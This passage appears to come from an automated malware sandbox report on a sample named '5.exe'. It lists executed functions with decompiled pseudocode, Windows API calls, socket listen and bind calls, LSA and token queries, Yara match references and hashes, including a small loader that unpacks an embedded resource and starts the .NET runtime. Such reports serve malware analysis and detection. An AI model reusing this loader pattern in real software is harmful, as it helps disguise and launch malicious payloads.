                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 190613189-0
                                                                                              • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                              • Instruction ID: 67566e0cb393ef72fa6fa9f0f91681af9918d2384c5fdc364e409a19ee530f2a
                                                                                              • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                                                                                              • Instruction Fuzzy Hash: D2F0A73620AD51EBD2025B255C04E6B7A99EF91324B14057AF440F2144D3399C529BBB
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Analysis Process: 5.exe PID: 1060 Parent PID: 1928 5.exeCOMMON

                                                                                              Executed Functions

                                                                                              Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}








                                                                                              0x0040149f
                                                                                              0x004014a5
                                                                                              0x004014a9
                                                                                              0x004014ec
                                                                                              0x004014ee
                                                                                              0x004014ee
                                                                                              0x004014b7
                                                                                              0x004014bb
                                                                                              0x004014c7
                                                                                              0x004014cd
                                                                                              0x004014d3
                                                                                              0x004014d8
                                                                                              0x004014e0
                                                                                              0x004014e0
                                                                                              0x004014d8
                                                                                              0x004014e6
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
                                                                                              • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
                                                                                              • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
                                                                                              • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
                                                                                              • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
                                                                                                • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
                                                                                              • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
                                                                                              • ExitProcess.KERNEL32 ref: 004014EE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
                                                                                              • String ID: v2.0.50727
                                                                                              • API String ID: 2372384083-2350909873
                                                                                              • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                                                                              • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
                                                                                              • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
                                                                                              • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 023A1DA8, Relevance: 1.6, Instructions: 1631COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 27fd5c2f987fc51fe0b45e25207655d87d3d3610e2bdf2b83abec22d26542731
                                                                                              • Instruction ID: cb4aec970b0652a17419f7a4d5563c99f738f8780bd91cbc5388fd676a4467e1
                                                                                              • Opcode Fuzzy Hash: 27fd5c2f987fc51fe0b45e25207655d87d3d3610e2bdf2b83abec22d26542731
                                                                                              • Instruction Fuzzy Hash: EE03CE74E012288FCB65DF68C894BADBBB6BB49304F1085EAD509A7394DB309EC5CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E0B20, Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • listen.WS2_32(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E0BB4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: listen
                                                                                              • String ID:
                                                                                              • API String ID: 3257165821-0
                                                                                              • Opcode ID: 9ae8189d3d082d560bf87226549f6b0c78393993a1fd0f30c39055333303bdc6
                                                                                              • Instruction ID: 50f11c930dcede59a77fd2088394e25da8ccd8f412b1d36ae13ba04fb3c21a77
                                                                                              • Opcode Fuzzy Hash: 9ae8189d3d082d560bf87226549f6b0c78393993a1fd0f30c39055333303bdc6
                                                                                              • Instruction Fuzzy Hash: 6921F7B14053846FEB128B54DC85F96BFB8FF42324F0880ABE945AF153E374A909C761
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E0F3B, Relevance: 1.6, APIs: 1, Instructions: 81networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • bind.WS2_32(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E0FCF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: bind
                                                                                              • String ID:
                                                                                              • API String ID: 1187836755-0
                                                                                              • Opcode ID: dc16f19f873dec56d5718c562158bf4b1e0ac45d60bfbfbbe341a5ef6dc6997a
                                                                                              • Instruction ID: a86f0bb3183df88a9f9cdca128c3385602144211258f9b9c7e36f993c78a7f21
                                                                                              • Opcode Fuzzy Hash: dc16f19f873dec56d5718c562158bf4b1e0ac45d60bfbfbbe341a5ef6dc6997a
                                                                                              • Instruction Fuzzy Hash: 912194755093806FE7128F65CC84B97BFB8EF06310F0884ABE949DF152D364A809CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E0F6E, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • bind.WS2_32(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E0FCF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: bind
                                                                                              • String ID:
                                                                                              • API String ID: 1187836755-0
                                                                                              • Opcode ID: 0e8a0439a73ea50131d13f099ac14fc54621457159bfe7776ceec65548037d5d
                                                                                              • Instruction ID: ceaa8a7dcf527321befc813e3a7cc499a2b8eca98c759561201567ec122633a2
                                                                                              • Opcode Fuzzy Hash: 0e8a0439a73ea50131d13f099ac14fc54621457159bfe7776ceec65548037d5d
                                                                                              • Instruction Fuzzy Hash: F11182B1504204AFEB20CF55DC85FA7FBA8EF44721F14846BEE5AAB241D7B4E444CA72
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E0B5E, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • listen.WS2_32(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E0BB4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: listen
                                                                                              • String ID:
                                                                                              • API String ID: 3257165821-0
                                                                                              • Opcode ID: 1f5bb61e836e8026dc0400aac2d912a78cb49347a64996aaa1c21faf97f1ad85
                                                                                              • Instruction ID: 10eea241f753347307f81a3a9f237cc7e257f15496d1b0aacd2b1281625cdeb7
                                                                                              • Opcode Fuzzy Hash: 1f5bb61e836e8026dc0400aac2d912a78cb49347a64996aaa1c21faf97f1ad85
                                                                                              • Instruction Fuzzy Hash: 6111E971904204AFEB11CF55DC84BA6FBA8EF44321F149467EE59EF241D774A444CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}




                                                                                              0x00401e22
                                                                                              0x00401e28

                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000001.265732741.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                                                              • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
                                                                                              • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 023A1D98, Relevance: .8, Instructions: 783COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291055002.00000000023A0000.00000040.00000001.sdmp, Offset: 023A0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6e79b41e2409fb7c8a01e35416fe14d2ea93a5089aec5679f6aa1296cda13a2a
                                                                                              • Instruction ID: 6e3bfe7b594db3460e330843a7b7ae5ea79433dc9d5a36f9ebca38873a2a44b9
                                                                                              • Opcode Fuzzy Hash: 6e79b41e2409fb7c8a01e35416fe14d2ea93a5089aec5679f6aa1296cda13a2a
                                                                                              • Instruction Fuzzy Hash: CC82C474A012688FCB69DF28C894BEDBBB6BB49304F1084EAD509A7354DB319EC5CF54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







                                                                                              0x004055c5
                                                                                              0x004055cf
                                                                                              0x004055d3
                                                                                              0x004055e4
                                                                                              0x004055e8
                                                                                              0x004055ed
                                                                                              0x004055f3
                                                                                              0x004055f8
                                                                                              0x004055fd
                                                                                              0x00405602
                                                                                              0x00405609
                                                                                              0x004055d5
                                                                                              0x004055d5
                                                                                              0x004055d5
                                                                                              0x00405614

                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000001.265732741.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: EnvironmentStrings$Free
                                                                                              • String ID:
                                                                                              • API String ID: 3328510275-0
                                                                                              • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                                                                              • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
                                                                                              • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
                                                                                              • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5B64A, Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LsaLookupNames2.ADVAPI32(?,00000E80,?,?), ref: 00C5B732
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: LookupNames2
                                                                                              • String ID:
                                                                                              • API String ID: 2701605370-0
                                                                                              • Opcode ID: 6860237168ac0c6de663f9bc0e92d55d8bfdab8561684a41c0a5ffc0f3f1aa80
                                                                                              • Instruction ID: 2d9592765e5978bfe59cb08d6e2ae8fa6803968188d9f0dfa4b056a7bb073b33
                                                                                              • Opcode Fuzzy Hash: 6860237168ac0c6de663f9bc0e92d55d8bfdab8561684a41c0a5ffc0f3f1aa80
                                                                                              • Instruction Fuzzy Hash: C5418F7240E3C05FD7138B258C65A62BFB4AF43710F1E85DBD8C49F1A3D669690AC7A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5B859, Relevance: 1.6, APIs: 1, Instructions: 113registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNELBASE(?,00000E80,?,?), ref: 00C5B932
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: 701d1c93f3c0bd7c69a3e7f780500ec7a9ba2b159657e8869d7c89220327b56e
                                                                                              • Instruction ID: f7340b7a790d27597dd6f6720539cf04747840e6eb9ac3e8ee56660ae91e4869
                                                                                              • Opcode Fuzzy Hash: 701d1c93f3c0bd7c69a3e7f780500ec7a9ba2b159657e8869d7c89220327b56e
                                                                                              • Instruction Fuzzy Hash: 68415A2500E3C06FD30387258C65A61BFB4EF47620B0E85DBE8C48B5A3D2296D1AD7B6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5BD47, Relevance: 1.6, APIs: 1, Instructions: 98fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00C5BDFD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: ea29918558c8cbbdb4b3ca64a9f73d370d56c8570b0e1062c044b2a42aa5ea84
                                                                                              • Instruction ID: 5ba76322d773b9cc784b12384077d86b731b4dea37bfc632ec50ed974ab43892
                                                                                              • Opcode Fuzzy Hash: ea29918558c8cbbdb4b3ca64a9f73d370d56c8570b0e1062c044b2a42aa5ea84
                                                                                              • Instruction Fuzzy Hash: 98319EB5504380AFE722CB25CC45FA2BFF8EF06314F08849AE9849B252D371E909CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5ABA2, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(?,00000E80), ref: 00C5AC51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: 621d84e0931ef262e768383815136ed2ec40445a28f246204c7d3afc2e2c962c
                                                                                              • Instruction ID: 0728040fa1a20863cced6d45cc28182e6e873cf2be93fc9acd8926469f0d4077
                                                                                              • Opcode Fuzzy Hash: 621d84e0931ef262e768383815136ed2ec40445a28f246204c7d3afc2e2c962c
                                                                                              • Instruction Fuzzy Hash: AE31D4B25043846FE7228B25CC85FA7BFFCEF05310F08859AED859B152D625E949CB71
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E2535, Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ClassInfo
                                                                                              • String ID:
                                                                                              • API String ID: 3534257612-0
                                                                                              • Opcode ID: 695e989cebd62263c4bcb49267e44bfea93fa04aec2c60edc5443d3e6aafa3c8
                                                                                              • Instruction ID: cacf33e24a3411dbf1bcda8645e360be9218a5f62c42911185c323c13e0fa96a
                                                                                              • Opcode Fuzzy Hash: 695e989cebd62263c4bcb49267e44bfea93fa04aec2c60edc5443d3e6aafa3c8
                                                                                              • Instruction Fuzzy Hash: B1313CA550E3C09FDB138B219C60A52BFB8AF07214B0D80DBD885CF2A3D2689908C772
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E11D9, Relevance: 1.6, APIs: 1, Instructions: 90networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: accept
                                                                                              • String ID:
                                                                                              • API String ID: 3005279540-0
                                                                                              • Opcode ID: 13e2159334501ae17daab9516be85d0865b02871f02545f45829360b0b1152de
                                                                                              • Instruction ID: ae412ebd573908ba53297febd30642caf9749c5d67feef9bc13895bb278c94dd
                                                                                              • Opcode Fuzzy Hash: 13e2159334501ae17daab9516be85d0865b02871f02545f45829360b0b1152de
                                                                                              • Instruction Fuzzy Hash: 67317075509780AFE712CB65DC44B56BFF8EF06214F08849AE9889F253D375A908CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5AC99, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegQueryValueExW.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 00C5AD54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: QueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 3660427363-0
                                                                                              • Opcode ID: 9cf68b118ac11710fa9c2da79b2ca75c7b16dfd6fb503aea6b9c0d168291d646
                                                                                              • Instruction ID: 85c46475c81cb7657696ceb21bdf1657a258061791a87d157ae0d97393a74e72
                                                                                              • Opcode Fuzzy Hash: 9cf68b118ac11710fa9c2da79b2ca75c7b16dfd6fb503aea6b9c0d168291d646
                                                                                              • Instruction Fuzzy Hash: 9031C4765083846FE722CB65CC84FA2BFB8EF06311F08859AE985CB152D364E94CCB65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E0CE8, Relevance: 1.6, APIs: 1, Instructions: 89timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetProcessTimes.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E0D85
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: ProcessTimes
                                                                                              • String ID:
                                                                                              • API String ID: 1995159646-0
                                                                                              • Opcode ID: 0a647f831d4933d4a20ec1996c13165b023f1b7747dd0bc9a74bfe53cb2fca3d
                                                                                              • Instruction ID: cadb62189d7c6bde1cb28213efe23436024589d00a0577254d88899cfcf14493
                                                                                              • Opcode Fuzzy Hash: 0a647f831d4933d4a20ec1996c13165b023f1b7747dd0bc9a74bfe53cb2fca3d
                                                                                              • Instruction Fuzzy Hash: 4931D5725093806FEB128F64DC45FA6BFB8EF06310F0884ABE985DB153D365A509D771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E069C, Relevance: 1.6, APIs: 1, Instructions: 87fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: FileView
                                                                                              • String ID:
                                                                                              • API String ID: 3314676101-0
                                                                                              • Opcode ID: 477fd73f04e6e06555c5841b2bb91e030434520928dd7e7d9a05421aaaeb892d
                                                                                              • Instruction ID: f098f60596b1fbb0d7dd6c690e52200fefedecf5f54a02a08460bb88ed06cc28
                                                                                              • Opcode Fuzzy Hash: 477fd73f04e6e06555c5841b2bb91e030434520928dd7e7d9a05421aaaeb892d
                                                                                              • Instruction Fuzzy Hash: FD31D6B2404780AFE722CB55DC85F56FFF8EF05320F04859EE9849B252D375A909CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5B104, Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetTokenInformation.KERNELBASE(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 00C5B19C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: InformationToken
                                                                                              • String ID:
                                                                                              • API String ID: 4114910276-0
                                                                                              • Opcode ID: 395290c94f43d0fa8ff82797226f0ef96d90e0e713ad0c4990fc6352e804a1b2
                                                                                              • Instruction ID: a860426ac86052bef1695f303297769bc9ee1a919623a636191c9e6a95b0f65c
                                                                                              • Opcode Fuzzy Hash: 395290c94f43d0fa8ff82797226f0ef96d90e0e713ad0c4990fc6352e804a1b2
                                                                                              • Instruction Fuzzy Hash: 6C21D2715083806FEB228F65CC94FA7BFB8EF06310F0884AAE985DF152D720A948C761
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5B423, Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LsaOpenPolicy.ADVAPI32(?,00000E80), ref: 00C5B4BF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: OpenPolicy
                                                                                              • String ID:
                                                                                              • API String ID: 2030686058-0
                                                                                              • Opcode ID: 2a5a5c8bcd81ae514c827c8b03cfec17af36a6bc0ea491d2ada41e77019bc608
                                                                                              • Instruction ID: e53ee69a30d9ca0cfc086a85ccfac74f821b4325e5f5564fa717cd5c77cb3129
                                                                                              • Opcode Fuzzy Hash: 2a5a5c8bcd81ae514c827c8b03cfec17af36a6bc0ea491d2ada41e77019bc608
                                                                                              • Instruction Fuzzy Hash: 0A21A072504344AFEB21CF65DC85FA6BFF8EF05310F18889AED859B152D324E948CB65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E0A29, Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateMutexW.KERNELBASE(?,?), ref: 024E0AC9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateMutex
                                                                                              • String ID:
                                                                                              • API String ID: 1964310414-0
                                                                                              • Opcode ID: 5c5edb6e9a59f177d2f23c9e0d38de9a812ad663a9096be09366a27b0dec69f4
                                                                                              • Instruction ID: f5735c86d408af737442348b3abf3d9010e838ef1b6ed92ab61fdc5bd70c8b0f
                                                                                              • Opcode Fuzzy Hash: 5c5edb6e9a59f177d2f23c9e0d38de9a812ad663a9096be09366a27b0dec69f4
                                                                                              • Instruction Fuzzy Hash: CD3193B1509384AFE712CF65CC85F56FFF8EF05214F0884AEE9859B292D365E908CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E1491, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileMappingW.KERNELBASE(?,00000E80,?,?), ref: 024E153E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: CreateFileMapping
                                                                                              • String ID:
                                                                                              • API String ID: 524692379-0
                                                                                              • Opcode ID: 8b21ea20b0bbf3b189033f72c7475f713c8542af2ad09d85cf54ea3e15609582
                                                                                              • Instruction ID: 771cd5518200aee6104c3ff66ff2a30ca546aac5e4cb03b7f618110d1f1054b2
                                                                                              • Opcode Fuzzy Hash: 8b21ea20b0bbf3b189033f72c7475f713c8542af2ad09d85cf54ea3e15609582
                                                                                              • Instruction Fuzzy Hash: CF318F725093C06FD3138B25DC55B62BFB8EF47610F0A81DBE8848F593D265A909C7A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5A266, Relevance: 1.6, APIs: 1, Instructions: 79networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WSAStartup.WS2_32(?,00000E80,?,?), ref: 00C5A2FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.290770281.0000000000C5A000.00000040.00000001.sdmp, Offset: 00C5A000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: Startup
                                                                                              • String ID:
                                                                                              • API String ID: 724789610-0
                                                                                              • Opcode ID: 30f563a8888c785f37ff5ace4f1d9ab9ea3ad484605f8963feb89a1db838109f
                                                                                              • Instruction ID: 817d3665e16bac1fc28f33f80d761017823529eed210bb8750977c1aeaa87c52
                                                                                              • Opcode Fuzzy Hash: 30f563a8888c785f37ff5ace4f1d9ab9ea3ad484605f8963feb89a1db838109f
                                                                                              • Instruction Fuzzy Hash: 4121C77140D3C05FC7028B658C55B66BFB4EF47620F0985DBE9848F193D239A819CBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 024E12EB, Relevance: 1.6, APIs: 1, Instructions: 79networkCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WSAEventSelect.WS2_32(?,00000E80,1055896A,00000000,00000000,00000000,00000000), ref: 024E137A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.291106224.00000000024E0000.00000040.00000001.sdmp, Offset: 024E0000, based on PE: false
                                                                                              Similarity
                                                                                              • API ID: EventSelect
                                                                                              • String ID:
                                                                                              • API String ID: 31538577-0
                                                                                              • Opcode ID: 191f9bcb07ebc814ab40a9f6eaff33fd8576aeb095d38edc66e579f72d96120b
                                                                                              • Instruction ID: 3569953158492a1bba6af174563ec56dbbdb2f176a74620477130708df607bfc
                                                                                              • Opcode Fuzzy Hash: 191f9bcb07ebc814ab40a9f6eaff33fd8576aeb095d38edc66e579f72d96120b
                                                                                              • Instruction Fuzzy Hash: 112186714093846FEB128B658C84F97BFB8EF46210F0884ABEA49DB152D764A808C771
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00C5BE54, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                              Download Yara Rule
